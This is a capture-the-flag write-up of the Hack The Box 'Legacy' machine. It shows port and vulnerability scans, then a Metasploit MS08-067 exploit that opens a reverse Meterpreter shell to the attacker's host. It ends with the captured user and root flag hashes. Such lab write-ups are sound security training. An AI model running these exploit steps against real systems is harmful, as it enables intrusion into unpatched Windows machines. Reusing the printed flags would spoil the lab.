Legacy
Port Scan Results ⤵️
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
┌──(kali㉿kali)-[~/Downloads/HTB/Legacy]
└─$ rustscan -t 5000 -a 10.10.10.4 --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.10.4:135
Open 10.10.10.4:139
Open 10.10.10.4:445
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p ")
NMAP SCAN Results ⤵️
┌──(kali㉿kali)-[~/Downloads/HTB/Legacy]
└─$ sudo nmap -sV --script vuln -p 135,139,445 -T5 10.10.10.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 12:19 IST
Nmap scan report for 10.10.10.4
Host is up (0.37s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
SMB Enumeration ⤵️
Through Enumeration I got the SMB version vulnerable so lets exploit this version through metasploit C2 plateform →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
┌──(kali㉿kali)-[~/Downloads/HTB/Legacy]
└─$ msfconsole -q
msf6 > search ms08-067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.2.77 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST tun0
LHOST => 10.10.16.6
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 10.10.16.6:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.16.6:4444 -> 10.10.10.4:1032) at 2023-12-28 12:24:58 +0530
meterpreter > whoami
[-] Unknown command: whoami
meterpreter > shell
Process 520 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
C:\WINDOWS\system32>hostname
hostname
legacy
C:\WINDOWS\system32>cd ../../
C:\>systeminfo
systeminfo
Host Name: LEGACY
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 3 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Uniprocessor Free
Registered Owner: user
Registered Organization: HTB
Product ID: 55274-643-7213323-23904
Original Install Date: 16/3/2017, 7:32:23 ��
System Up Time: 0 Days, 0 Hours, 36 Minutes, 5 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 23 Model 49 Stepping 0 AuthenticAMD ~2993 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1.023 MB
Available Physical Memory: 805 MB
Virtual Memory: Max Size: 2.048 MB
Virtual Memory: Available: 2.005 MB
Virtual Memory: In Use: 43 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
NetWork Card(s): 1 NIC(s) Installed.
[01]: VMware Accelerated AMD PCNet Adapter
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.4
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\
16/03/2017 07:30 �� 0 AUTOEXEC.BAT
16/03/2017 07:30 �� 0 CONFIG.SYS
16/03/2017 08:07 �� <DIR> Documents and Settings
29/12/2017 10:41 �� <DIR> Program Files
18/05/2022 02:10 �� <DIR> WINDOWS
2 File(s) 0 bytes
3 Dir(s) 6.342.119.424 bytes free
C:\>cd "Documents and Settings"
cd "Documents and Settings"
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings
16/03/2017 08:07 �� <DIR> .
16/03/2017 08:07 �� <DIR> ..
16/03/2017 08:07 �� <DIR> Administrator
16/03/2017 07:29 �� <DIR> All Users
16/03/2017 07:33 �� <DIR> john
0 File(s) 0 bytes
5 Dir(s) 6.342.115.328 bytes free
C:\Documents and Settings>cd john
cd john
C:\Documents and Settings\john>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\john
16/03/2017 07:33 �� <DIR> .
16/03/2017 07:33 �� <DIR> ..
16/03/2017 08:19 �� <DIR> Desktop
16/03/2017 07:33 �� <DIR> Favorites
16/03/2017 07:33 �� <DIR> My Documents
16/03/2017 07:20 �� <DIR> Start Menu
0 File(s) 0 bytes
6 Dir(s) 6.342.115.328 bytes free
C:\Documents and Settings\john>tree /a /f
tree /a /f
Folder PATH listing
Volume serial number is 00610050 54BF:723B
C:.
+---Desktop
| user.txt
|
+---Favorites
| | MSN.com.url
| | Radio Station Guide.url
| |
| \---Links
| Customize Links.url
| Free Hotmail.url
| Windows Marketplace.url
| Windows Media.url
| Windows.url
|
+---My Documents
| +---My Music
| | Sample Music.lnk
| |
| \---My Pictures
| Sample Pictures.lnk
|
\---Start Menu
\---Programs
| Internet Explorer.lnk
| Outlook Express.lnk
| Remote Assistance.lnk
| Windows Media Player.lnk
|
+---Accessories
| | Address Book.lnk
| | Command Prompt.lnk
| | Notepad.lnk
| | Program Compatibility Wizard.lnk
| | Synchronize.lnk
| | Tour Windows XP.lnk
| | Windows Explorer.lnk
| |
| +---Accessibility
| | Magnifier.lnk
| | Narrator.lnk
| | On-Screen Keyboard.lnk
| | Utility Manager.lnk
| |
| \---Entertainment
| Windows Media Player.lnk
|
\---Startup
C:\Documents and Settings\john>cd Desktop
cd Desktop
C:\Documents and Settings\john\Desktop>type user.txt
type user.txt
e69af0e4f443de7e36876fda4ec7644f
C:\Documents and Settings\john\Desktop>cd ../../
cd ../../
C:\Documents and Settings>cd Administrator
cd Administrator
C:\Documents and Settings\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\Administrator
16/03/2017 08:07 �� <DIR> .
16/03/2017 08:07 �� <DIR> ..
16/03/2017 08:18 �� <DIR> Desktop
16/03/2017 08:07 �� <DIR> Favorites
16/03/2017 08:07 �� <DIR> My Documents
16/03/2017 07:20 �� <DIR> Start Menu
0 File(s) 0 bytes
6 Dir(s) 6.342.098.944 bytes free
C:\Documents and Settings\Administrator>cd Desktop
cd Desktop
C:\Documents and Settings\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\Administrator\Desktop
16/03/2017 08:18 �� <DIR> .
16/03/2017 08:18 �� <DIR> ..
16/03/2017 08:18 �� 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 6.342.094.848 bytes free
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
993442d258b0e0ec917cae9e695d5713
I got the Administrators Access !!
If you have any questions or suggestions, please leave a comment below. Thank You !
This post is licensed under CC BY 4.0 by the author.